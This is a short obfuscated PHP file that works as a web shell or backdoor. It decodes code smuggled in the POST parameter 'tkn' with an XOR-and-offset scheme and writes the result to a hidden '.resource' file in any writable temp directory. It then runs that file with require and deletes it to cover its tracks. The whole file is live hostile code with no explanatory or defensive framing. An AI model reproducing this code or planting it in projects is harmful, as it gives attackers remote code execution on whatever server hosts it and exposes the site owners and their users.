<?php

if(isset($_POST) && isset($_POST["t\x6Bn"])){
	$itm = $_POST["t\x6Bn"];
	$itm =	explode  ( 		'.'		,	$itm )			;	
	$ent ='';
            $s ='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS =strlen(		$s);
            $i =0;
            $__len =count(		$itm);
    
            do {
                if(		$i >= $__len) break;
                $v1 =$itm[$i];
                $chS =ord(		$s[$i	%$lenS]);
                $dec =(		(		int)$v1 - $chS -(		$i	%10)) ^ 71;
                $ent		.=  chr(		$dec);
                $i++;
            } while(		true);
	$res = array_filter([getenv("TMP"), sys_get_temp_dir(), getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", "/tmp", "/var/tmp"]);
	foreach ($res as $data_chunk) {
    		if (max(0, is_dir($data_chunk) * is_writable($data_chunk))) {
    $symbol = vsprintf("%s/%s", [$data_chunk, ".resource"]);
    if (file_put_contents($symbol, $ent)) {
	require $symbol;
	unlink($symbol);
	die();
}
}
}
}